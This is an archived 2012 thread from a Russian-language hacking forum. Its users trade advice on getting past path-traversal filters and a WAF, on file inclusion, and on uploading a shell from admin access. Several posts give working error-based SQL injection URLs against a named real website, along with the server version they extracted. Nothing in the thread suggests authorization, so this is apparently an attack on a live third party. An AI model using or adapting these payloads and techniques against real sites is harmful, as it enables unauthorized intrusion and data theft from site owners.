ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.05.2012, 19:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
5245
Репутация:
0
|
|
Существует ли альтернатива для поднятия на директорию выше?
Код:
Code:
/../
\..\
/..\
\../
^^ фильтруются
Подняться на одну могу через ../ Выше никак.
Выдаёт:
Код:
Code:
Forbidden
You don't have permission to access /script.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
|
|
|
|
06.05.2012, 20:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
142623
Репутация:
19
|
|
Сообщение от None
Не знаю туда или нет, но все-таки спрошу:
Есть доступ к админке, там есть возможность заливки pdf файла. В итоге файл получает ссылку вида http://shell.com/download.php?id=418.
В БД никаких упоминай о файле... По крайней мере в данных к которым у меня есть доступ.
Вопрос в том как этот файл запустить.
P.S По этой ссылке выдает ошибку "Не удалось загрузить документ PDF.
Не как, надо грузить на серв(ИЩИ В АДМИНКЕ НАСТРОЙКИ ЗАГРУЗКИ).
Сообщение от None
Выше никак.
Прав не хватает?
|
|
|
|
06.05.2012, 20:15
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to TorRom
Может быть WAF? Как вариант
|
|
|
06.05.2012, 21:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
5245
Репутация:
0
|
|
Сообщение от mironich
mironich said:
Прав не хватает?
Я не так далеко лезу. Должно хватать. Не выше корня сайта.
Сообщение от cat1vo
cat1vo said:
to
TorRom
Может быть WAF? Как вариант
Да, это WAF. Проверил, если запрос содержит:
Код:
Code:
union
#00
alert(
Получаем 403 Forbidden
allow_url_include=on по всей видимости, фишка с data не работает. Есть ещё способы?
|
|
|
|
07.05.2012, 01:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
17780
Репутация:
1
|
|
Можно ли Залить шелл на ipb 3.6.x ? Есть доступ к админке
|
|
|
|
07.05.2012, 01:51
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to --=[Bob]=--
Последняя версия — IPB 3.3.0: 21 марта 2012
Вы, ничего не путаете? |
|
|
|
07.05.2012, 02:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Guys. I got version working perfectly.
Код:
Code:
http://af-art.be/common/catalog2.php?g_id=3+or+1+group+by+concat_ws%280x7e,version%28%29,floor%28rand%280%29*2%29%29+having+min%280%29+or+1--
I cannot grab tables. |
|
|
|
07.05.2012, 03:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Сообщение от lightangel
lightangel said:
Guys. I got version working perfectly.
Код:
Code:
http://af-art.be/common/catalog2.php?g_id=3+or+1+group+by+concat_ws%280x7e,version%28%29,floor%28rand%280%29*2%29%29+having+min%280%29+or+1--
I cannot grab tables. Because there is no `information_schema.table`. Logically, is not it?
|
|
|
|
07.05.2012, 03:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
But this is version 5.
Only version 4 has no `information_schema.table`.
|
|
|
|
07.05.2012, 03:53
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Код:
Code:
Duplicate entry '3.23.58~1' for key 1
http://af-art.be/common/catalog2.php?g_id=3+and+substring(version(),1,1)like(4)
http://af-art.be/common/catalog2.php?g_id=3+and+substring(version(),1,1)like(3)
You have 3.23.58 version of MySQL. Information_schema appeared in the 5 version of MySQL |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для --=[Bob]=--](/avatars/avatar.jpg?3132671){kind=avatar}
Похожие темы
Линейный вид
